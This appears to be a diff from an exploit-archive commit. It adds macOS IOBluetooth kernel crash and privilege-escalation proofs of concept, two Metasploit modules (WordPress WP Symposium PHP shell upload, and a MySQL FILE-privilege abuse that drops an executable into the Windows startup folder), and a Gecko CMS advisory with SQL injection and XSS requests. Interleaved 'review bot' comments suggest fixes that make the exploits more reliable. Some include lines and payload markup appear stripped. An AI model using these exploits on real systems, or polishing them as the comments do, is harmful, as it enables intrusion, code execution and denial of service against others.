000000000..fe5df7982 --- /dev/null +++ b/platforms/osx/dos/35772.c 
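Review bot: `inputStructCnt` is passed as the literal 120 and the debug dump loops to 120 as well, while `struct BluetoothCall` is 7*8 + 7*8 + 8 = 120 bytes only on this layout; `sizeof(a)` in both places keeps them in sync, and the sibling PoCs in this commit already use `sizeof(a)` for the call. The `#include` lines have lost their header names in this rendering, so the file as shown will not compile — verify the committed source. `port` is an `io_connect_t` (an unsigned Mach port name), so `%u` rather than `%d` in the diagnostic printf.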
@@ -0,0 +1,74 @@ +/* + * crash-issue2.c: Written for Mac OS X Yosemite (10.10) by @rpaleari and @joystick. + * + * Triggers a panic overwriting a stack_canary. + * + * gcc -Wall -o crash-issue2{,.c} -framework IOKit + * + */ + +#include +#include +#include +#include +#include + +#include + +struct BluetoothCall { + uint64_t args[7]; + uint64_t sizes[7]; + uint64_t index; +}; + +int main(void) { + /* Finding vuln service */ + io_service_t service = + IOServiceGetMatchingService(kIOMasterPortDefault, + IOServiceMatching("IOBluetoothHCIController")); + + if (!service) { + return -1; + } + + /* Connect to vuln service */ + io_connect_t port = (io_connect_t) 0; + kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port); + IOObjectRelease(service); + if (kr != kIOReturnSuccess) { + return kr; + } + + printf(" [+] Opened connection to service on port: %d\n", port); + + struct BluetoothCall a; + + a.sizes[0] = 0x1000; + a.args[0] = (uint64_t) calloc(a.sizes[0], sizeof(char)); + + /* This arguments overflows a local buffer and the adjacent stack canary */ + a.sizes[1] = 264; + a.args[1] = (uint64_t) calloc(a.sizes[1], sizeof(char)); + memset((void *)a.args[1], 'A', a.sizes[1]); + + /* Call IOBluetoothHCIUserClient::DispatchHCIReadLocalName() */ + a.index = 0x2d; + + /* Debug */ + for(int i = 0; i < 120; i++) { + if(i % 8 == 0) printf("\n"); + printf("\\x%02x", ((unsigned char *)&a)[i]); + } + printf("\n"); + fflush(stdout); + + kr = IOConnectCallMethod((mach_port_t) port, /* Connection */ + (uint32_t) 0, /* Selector */ + NULL, 0, /* input, inputCnt */ + (const void*) &a, /* inputStruct */ + sizeof(a), /* inputStructCnt */ + NULL, NULL, NULL, NULL); /* Output stuff */ + printf("kr: %08x\n", kr); + + return IOServiceClose(port); +} diff --git a/platforms/osx/dos/35773.c b/platforms/osx/dos/35773.c new file mode 100755 index 000000000..86071f68c --- /dev/null +++ b/platforms/osx/dos/35773.c 
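Review bot: `a` is left uninitialized apart from `args[0..1]` and `sizes[0..1]`, so `args[2..6]`, `sizes[2..6]` are whatever was on the stack when the whole struct is copied in with `sizeof(a)`; 35773.c in the same commit zeroes it with `memset(&a, 0, sizeof(a));` first, and doing the same here makes the panic reproducible rather than dependent on stack contents. The inline comment says index 0x2d selects `DispatchHCIReadLocalName()` while the files.csv entry titles this PoC `BluetoothHCIChangeLocalName`; one of the two is wrong and should be aligned. The `#include` header names have been stripped in this rendering — double-check the committed source compiles.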
@@ -0,0 +1,77 @@ +/* + * crash-issue3.c: Written for Mac OS X Yosemite (10.10) by @rpaleari and @joystick. + * + * Exploits a missing check in + * IOBluetoothHCIController::TransferACLPacketToHW() to trigger a panic. + * + * gcc -Wall -o crash-issue3{,.c} -framework IOKit + * + */ + +#include +#include +#include +#include +#include + +#include + +struct BluetoothCall { + uint64_t args[7]; + uint64_t sizes[7]; + uint64_t index; +}; + +int main(void) { + /* Finding vuln service */ + io_service_t service = + IOServiceGetMatchingService(kIOMasterPortDefault, + IOServiceMatching("IOBluetoothHCIController")); + + if (!service) { + return -1; + } + + /* Connect to vuln service */ + io_connect_t port = (io_connect_t) 0; + kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port); + IOObjectRelease(service); + if (kr != kIOReturnSuccess) { + return kr; + } + + printf(" [+] Opened connection to service on port: %d\n", port); + + struct BluetoothCall a; + + memset(&a, 0, sizeof(a)); + + a.sizes[0] = 0x1000; + a.args[0] = (uint64_t) calloc(a.sizes[0], sizeof(char)); + + a.sizes[1] = 0x1000; + a.args[1] = (uint64_t) calloc(a.sizes[1], sizeof(char)); + memset((void *)a.args[1], 0x22, 0x1000); + + + /* Call DispatchHCISendRawACLData() */ + a.index = 0x63; + + /* Debug */ + for(int i = 0; i < 120; i++) { + if(i % 8 == 0) printf("\n"); + printf("\\x%02x", ((unsigned char *)&a)[i]); + } + printf("\n"); + fflush(stdout); + + kr = IOConnectCallMethod((mach_port_t) port, /* Connection */ + (uint32_t) 0, /* Selector */ + NULL, 0, /* input, inputCnt */ + (const void*) &a, /* inputStruct */ + sizeof(a), /* inputStructCnt */ + NULL, NULL, NULL, NULL); /* Output stuff */ + printf("kr: %08x\n", kr); + + return IOServiceClose(port); +} diff --git a/platforms/osx/dos/35774.c b/platforms/osx/dos/35774.c new file mode 100755 index 000000000..30c515a01 --- /dev/null +++ b/platforms/osx/dos/35774.c 
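Review bot: `memset((void *)a.args[1], 0x22, 0x1000)` repeats the literal 0x1000 instead of the size recorded two lines earlier, so changing `a.sizes[1]` alone silently desynchronises the two; `memset((void *)a.args[1], 0x22, a.sizes[1]);` ties them together, and `if (!a.args[0] || !a.args[1]) return -1;` before it covers the unchecked calloc() results. The header comment attributes the panic to IOBluetoothHCIController::TransferACLPacketToHW() while the comment above `a.index = 0x63` says DispatchHCISendRawACLData(); if the latter is the user-client method that reaches the former, one sentence in the header saying so would save the reader guessing. The two buffers are never freed before IOServiceClose(), which is harmless for a one-shot PoC but worth a short comment so it does not read as an oversight.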
@@ -0,0 +1,141 @@ +/* + * lpe-issue1.c + * Written for Mac OS X Yosemite (10.10.1) by @joystick and @rpaleari. + * + * Exploits IOBluetoothHCIUserClient::DispatchHCIWriteStoredLinkKey() + * + * gcc -Wall -o lpe-issue1{,.c} -framework IOKit + * + */ + +#include +#include +#include +#include +#include + +#include + +#define SIZE 0x1000 + +struct BluetoothCall { + uint64_t args[7]; + uint64_t sizes[7]; + uint64_t index; +}; + +#ifndef bswap64 +# define bswap64(num) \ + ( (((uint64_t)(num) << 56) ) \ + | (((uint64_t)(num) << 40) & UINT64_C(0x00FF000000000000)) \ + | (((uint64_t)(num) << 24) & UINT64_C(0x0000FF0000000000)) \ + | (((uint64_t)(num) << 8) & UINT64_C(0x000000FF00000000)) \ + | (((uint64_t)(num) >> 8) & UINT64_C(0x00000000FF000000)) \ + | (((uint64_t)(num) >> 24) & UINT64_C(0x0000000000FF0000)) \ + | (((uint64_t)(num) >> 40) & UINT64_C(0x000000000000FF00)) \ + | (((uint64_t)(num) >> 56) ) ) +#endif + +void create_requests(io_connect_t port) +{ + struct BluetoothCall a; + uint32_t i; + kern_return_t kr; + + for (i = 0; i < 7; i++) { + a.args[i] = (uint64_t) calloc(SIZE, sizeof(char)); + a.sizes[i] = SIZE; + } + + /* DispatchHCIRequestCreate() */ + a.index = 0x0; + + *(uint64_t *)a.args[0] = 5*1000; /* Timeout */ + memset((void *)a.args[1], 0x81, 0x1000); + memset((void *)a.args[2], 0x82, 0x1000); + memset((void *)a.args[3], 0x83, 0x1000); + memset((void *)a.args[4], 0x84, 0x1000); + memset((void *)a.args[5], 0x85, 0x1000); + memset((void *)a.args[6], 0x86, 0x1000); + + for(i = 0; i < 500; i++) { + kr = IOConnectCallMethod((mach_port_t) port, /* Connection */ + (uint32_t) 0, /* Selector */ + NULL, 0, /* input, inputCnt */ + (const void*) &a, /* inputStruct */ + 120, /* inputStructCnt */ + NULL, NULL, NULL, NULL); /* Output stuff */ + + if(kr == 0xe00002bd) /* Full */ + break; + } +} + +int main(void) { + struct BluetoothCall a; + int i; + void *landing_page = calloc(SIZE, sizeof(char)); + + /* Init a */ + for (i = 0; i < 7; i++) { + a.args[i] = (uint64_t) 
calloc(SIZE, sizeof(char)); + a.sizes[i] = SIZE; + } + + /* Finding vuln service */ + io_service_t service = + IOServiceGetMatchingService(kIOMasterPortDefault, + IOServiceMatching("IOBluetoothHCIController")); + + if (!service) { + return -1; + } + + /* Connect to vuln service */ + io_connect_t port = (io_connect_t) 0; + kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port); + IOObjectRelease(service); + if (kr != kIOReturnSuccess) { + return kr; + } + + /* Populating with fake requests. */ + create_requests(port); + + /* IOBluetoothHCIUserClient::DispatchHCIWriteStoredLinkKey() */ + a.index = 42; + /* Req number */ + *((uint32_t *)a.args[0]) = 1; + /* num_of_keys */ + *((uint32_t *)a.args[1]) = 0x20; + + /* Padding */ + memset((void *)a.args[3], 0x33, 152); + /* mov rdi, [r14+0AB8h] */ + *((uint64_t *)(a.args[3]+152)) = bswap64((uint64_t)landing_page); + /* mov rax, [rdi] */ + *((uint64_t *)((uint64_t)landing_page)) = (uint64_t)landing_page; + /* call [rax+0x1d0]: this will trigger a #GP calling 0x4141414142424242 */ + *((uint64_t *)((uint64_t)landing_page+0x1d0)) = (uint64_t) 0x4141414142424242; + + /* Here some fixing to the vtable is required to return cleanly after the exploit */ + +#if 0 + /* Debug print */ + for(i = 0; i < 120; i++) { + if(i % 8 == 0) printf("\n"); + printf("\\x%02x", ((unsigned char *)&a)[i]); + } + printf("\n"); +#endif + + kr = IOConnectCallMethod((mach_port_t) port, /* Connection */ + (uint32_t) 0, /* Selector */ + NULL, 0, /* input, inputCnt */ + (const void*) &a, /* inputStruct */ + 120, /* inputStructCnt */ + NULL, NULL, NULL, NULL); /* Output stuff */ + printf("kr: %08x\n", kr); + + return IOServiceClose(port); +} diff --git a/platforms/php/remote/35778.rb b/platforms/php/remote/35778.rb new file mode 100755 index 000000000..b4a70c6b9 --- /dev/null +++ b/platforms/php/remote/35778.rb 
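Review bot: `if(kr == 0xe00002bd) /* Full */` in create_requests() compares against a bare IOReturn magic number; the value looks like kIOReturnNoSpace from IOKit's IOReturn.h (confirm), and `if (kr == kIOReturnNoSpace) break; /* request table full */` documents the stop condition better than the comment does. The same function allocates seven SIZE-byte buffers on every call and never frees them, and neither it nor main() checks calloc() for NULL before writing through the pointers (`*(uint64_t *)a.args[0] = 5*1000;`, the memset calls, the `landing_page` stores), so an allocation failure becomes a user-space crash that is easy to mistake for the kernel fault the file is meant to produce. `inputStructCnt` is the literal 120 in both IOConnectCallMethod() calls; `sizeof(a)` expresses the same thing and survives edits to the struct. The `int i` in main() is also shadowed in meaning by the `uint32_t i` of create_requests(); either type is fine, but the two functions should agree.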
@@ -0,0 +1,99 @@ +## +# This module requires Metasploit: http://www.metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::FileDropper + include Msf::HTTP::Wordpress + + def initialize(info = {}) + super(update_info( + info, + 'Name' => 'WordPress WP Symposium 14.11 Shell Upload', + 'Description' => %q{WP Symposium Plugin for WordPress contains a + flaw that allows a remote attacker to execute + arbitrary PHP code. This flaw exists because the + /wp-symposium/server/file_upload_form.php script + does not properly verify or sanitize + user-uploaded files. By uploading a .php file, + the remote system will place the file in a + user-accessible path. Making a direct request to + the uploaded file will allow the attacker to + execute the script with the privileges of the + web server.}, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Claudio Viviani', # Vulnerability disclosure + 'Rob Carr ' # Metasploit module + ], + 'References' => + [ + ['OSVDB', '116046'], + ['WPVDB', '7716'] + ], + 'DisclosureDate' => 'Dec 11 2014', + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [['wp-symposium < 14.12', {}]], + 'DefaultTarget' => 0 + )) + end + + def check + check_plugin_version_from_readme('wp-symposium', '14.12') + end + + def generate_mime_message(payload, payload_name, directory_name, symposium_url) + data = Rex::MIME::Message.new + data.add_part('1', nil, nil, 'form-data; name="uploader_uid"') + data.add_part("./#{directory_name}/", nil, nil, 'form-data; name="uploader_dir"') + data.add_part(symposium_url, nil, nil, 'form-data; name="uploader_url"') + data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"files[]\"; filename=\"#{payload_name}\"") + data + end + + def exploit + print_status("#{peer} - Preparing payload") + unique_name = Rex::Text.rand_text_alpha(10) + payload_name = 
"#{unique_name}.php" + symposium_url = normalize_uri(wordpress_url_plugins, 'wp-symposium', 'server', 'php') + payload_url = normalize_uri(symposium_url, unique_name, payload_name) + data = generate_mime_message(payload, payload_name, unique_name, symposium_url) + symposium_url = normalize_uri(symposium_url, 'index.php') + + print_status("#{peer} - Uploading payload to #{payload_url}") + res = send_request_cgi( + 'method' => 'POST', + 'uri' => symposium_url, + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => data.to_s + ) + + if res && res.code == 200 && res.body.length > 0 && !res.body.include?('error') && res.body != '0' + print_good("#{peer} - Uploaded the payload") + register_files_for_cleanup(payload_name) + + print_status("#{peer} - Executing the payload...") + send_request_cgi( + { + 'uri' => payload_url, + 'method' => 'GET' + }, 5) + print_good("#{peer} - Executed payload") + else + if res.nil? + fail_with(Failure::Unreachable, "No response from the target") + else + vprint_error("#{peer} - HTTP Status: #{res.code}") + vprint_error("#{peer} - Server returned: #{res.body}") + fail_with(Failure::UnexpectedReply, "Failed to upload the payload") + end + end + end +end \ No newline at end of file diff --git a/platforms/php/webapps/35767.txt b/platforms/php/webapps/35767.txt new file mode 100755 index 000000000..0dd7ddf6f --- /dev/null +++ b/platforms/php/webapps/35767.txt 
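Review bot: `register_files_for_cleanup(payload_name)` registers only the bare file name, but the form field `uploader_dir` sent the file into `./#{directory_name}/` and `payload_url` is built as `symposium_url/unique_name/payload_name`, so FileDropper is pointed at a path that does not match where the file landed and the dropped PHP file is likely to remain on the target after the session ends; the registered path should carry the same directory component, e.g. `register_files_for_cleanup("#{unique_name}/#{payload_name}")`, though which directory the session resolves a relative path against is not visible here and should be confirmed. `print_good("#{peer} - Executed payload")` is printed unconditionally after the GET, whose response is discarded, so a 404 on `payload_url` still reports success; checking the response (or at least its code) before printing would make the status honest. The `else` / `if res.nil?` / `else` nesting at the end of exploit() is an `elsif` chain written as two levels; `elsif res.nil?` flattens it.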
@@ -0,0 +1,117 @@ +?Gecko CMS 2.3 Multiple Vulnerabilities + +Vendor: JAKWEB +Product web page: http://www.cmsgecko.com +Affected version: 2.3 and 2.2 + +Summary: Gecko CMS is the way to go, forget complicated, bloated +and slow content management systems, Gecko CMS has been build to +be intuitive, easy to use, extendable to almost anything, running +on all standard web hosting (PHP and one MySQL database, Apache is +a plus), browser compatibility and fast, super fast! + +Desc: Gecko CMS suffers from multiple vulnerabilities including +Cross-Site Request Forgery, Stored and Reflected Cross-Site Scripting +and SQL Injection. + +Tested on: Apache/2 + PHP/5.4.36 + + +Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2015-5222 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5222.php + +27.12.2014 +--- + +CSRF Add Admin: +=============== + + +
+ + + + + + + + + +
+ + + +usergroup 4 = moderator + 3 = administrator + 2 = member standard + 1 = guest + 5 = banned + +Stored XSS (params: jak_img, jak_name, jak_url): +================================================ + +POST http://server/admin/index.php?p=categories&sp=newcat HTTP/1.1 + +jak_catparent 0 +jak_catparent2 0 +jak_footer 1 +jak_img "> +jak_lcontent

test

+jak_lcontent2 +jak_menu 1 +jak_name "> +jak_name2 +jak_url "> +jak_varname ZSL +save + +SQL Injection (params: jak_delete_log[], ssp): +============================================== + +POST /admin/index.php?p=logs&sp=s HTTP/1.1 + +delete=&jak_delete_log%5B%5D=4%20and%20benchmark(20000000%2csha1(1))--%20&jak_delete_log%5B%5D=2&jak_delete_log%5B%5D=1 + +-- + +GET /admin/index.php?p=logs&sp=delete&ssp=3[SQLi] HTTP/1.1 + +Reflected XSS: +============== + +/admin/index.php [horder%5B%5D parameter] +/admin/index.php [jak_catid parameter] +/admin/index.php [jak_content parameter] +/admin/index.php [jak_css parameter] +/admin/index.php [jak_delete_log%5B%5D parameter] +/admin/index.php [jak_email parameter] +/admin/index.php [jak_extfile parameter] +/admin/index.php [jak_file parameter] +/admin/index.php [jak_hookshow%5B%5D parameter] +/admin/index.php [jak_img parameter] +/admin/index.php [jak_javascript parameter] +/admin/index.php [jak_lcontent parameter] +/admin/index.php [jak_name parameter] +/admin/index.php [jak_password parameter] +/admin/index.php [jak_showcontact parameter] +/admin/index.php [jak_tags parameter] +/admin/index.php [jak_title parameter] +/admin/index.php [jak_url parameter] +/admin/index.php [jak_username parameter] +/admin/index.php [real_hook_id%5B%5D parameter] +/admin/index.php [sp parameter] +/admin/index.php [sreal_plugin_id%5B%5D parameter] +/admin/index.php [ssp parameter] +/admin/index.php [sssp parameter] +/js/editor/plugins/filemanager/dialog.php [editor parameter] +/js/editor/plugins/filemanager/dialog.php [field_id parameter] +/js/editor/plugins/filemanager/dialog.php [fldr parameter] +/js/editor/plugins/filemanager/dialog.php [lang parameter] +/js/editor/plugins/filemanager/dialog.php [popup parameter] +/js/editor/plugins/filemanager/dialog.php [subfolder parameter] +/js/editor/plugins/filemanager/dialog.php [type parameter] 
diff --git a/platforms/windows/remote/35777.rb b/platforms/windows/remote/35777.rb new file mode 100755 index 000000000..2cec772fa --- /dev/null +++ b/platforms/windows/remote/35777.rb 
@@ -0,0 +1,143 @@ +## +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::MYSQL + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Oracle MySQL for Microsoft Windows FILE Privilege Abuse', + 'Description' => %q{ + This module takes advantage of a file privilege misconfiguration problem + specifically against Windows MySQL servers. This module abuses the FILE + privilege to write a payload to Microsoft's All Users Start Up directory + which will execute every time a user logs in. The default All Users Start + Up directory used by the module is Windows 7 friendly. + }, + 'Author' => + [ + 'sinn3r', + 'Sean Verity + { + 'DisablePayloadHandler' => 'true' + }, + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2012-5613'], #DISPUTED + ['OSVDB', '88118'], + ['EDB', '23083'], + ['URL', 'http://seclists.org/fulldisclosure/2012/Dec/13'] + ], + 'Platform' => 'win', + 'Targets' => + [ + [ 'MySQL on Windows', { } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Dec 01 2012' + )) + + register_options( + [ + OptString.new('USERNAME', [ true, 'The username to authenticate as']), + OptString.new('PASSWORD', [ true, 'The password to authenticate with']), + OptString.new('STARTUP_FOLDER', [ true, 'The All Users Start Up folder', '/programdata/microsoft/windows/start menu/programs/startup/']) + ]) + end + + def check + m = mysql_login(datastore['USERNAME'], datastore['PASSWORD']) + return Exploit::CheckCode::Safe unless m + + return Exploit::CheckCode::Appears if is_windows? 
+ + Exploit::CheckCode::Safe + end + + def peer + "#{rhost}:#{rport}" + end + + def query(q) + rows = [] + + begin + res = mysql_query(q) + return rows unless res + res.each_hash do |row| + rows << row + end + rescue RbMysql::ParseError + return rows + end + + rows + end + + def is_windows? + r = query("SELECT @@version_compile_os;") + r[0]['@@version_compile_os'] =~ /^Win/ ? true : false + end + + def get_drive_letter + r = query("SELECT @@tmpdir;") + drive = r[0]['@@tmpdir'].scan(/^(\w):/).flatten[0] || '' + + drive + end + + def upload_file(bin, dest) + p = bin.unpack("H*")[0] + query("SELECT 0x#{p} into DUMPFILE '#{dest}'") + end + + def exploit + unless datastore['STARTUP_FOLDER'].start_with?('/') && datastore['STARTUP_FOLDER'].end_with?('/') + fail_with(Failure::BadConfig, "STARTUP_FOLDER should start and end with '/' Ex: /programdata/microsoft/windows/start menu/programs/startup/") + end + + print_status("#{peer} - Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") + begin + m = mysql_login(datastore['USERNAME'], datastore['PASSWORD']) + rescue RbMysql::AccessDeniedError + fail_with(Failure::NoAccess, "#{peer} - Access denied") + end + + fail_with(Failure::NoAccess, "#{peer} - Unable to Login") unless m + + unless is_windows? + fail_with(Failure::NoTarget, "#{peer} - Remote host isn't Windows") + end + + begin + drive = get_drive_letter + rescue RbMysql::ParseError + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name") + end + + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name") unless drive + + exe_name = Rex::Text::rand_text_alpha(5) + ".exe" + dest = "#{drive}:#{datastore['STARTUP_FOLDER']}#{exe_name}" + exe = generate_payload_exe + + print_status("#{peer} - Uploading to '#{dest}'") + begin + upload_file(exe, dest) + rescue RbMysql::AccessDeniedError + fail_with(Failure::NotVulnerable, "#{peer} - No permission to write. 
I blame kc :-)") + end + register_file_for_cleanup("#{dest}") + end + +end \ No newline at end of file
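Review bot: `get_drive_letter` returns `''` when `@@tmpdir` has no drive prefix (the `|| ''` fallback), and an empty string is truthy in Ruby, so `fail_with(Failure::UnexpectedReply, ...) unless drive` in exploit() can never fire and the module goes on to build `dest` as `":/programdata/..."`; the guard should be `fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name") if drive.empty?`. `query` already rescues RbMysql::ParseError and returns an empty array, so the `rescue RbMysql::ParseError` wrapped around `get_drive_letter` in exploit() is unreachable, and the real failure mode in both `is_windows?` and `get_drive_letter` is `r[0]` being nil and raising NoMethodError; both methods should return early when `r.empty?`. `print_status("#{peer} - Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")` writes the credential into the console and any log; the username alone is enough for a status line. `check` calls `mysql_login` without the `rescue RbMysql::AccessDeniedError` that exploit() uses, so a wrong password raises out of check instead of returning a CheckCode.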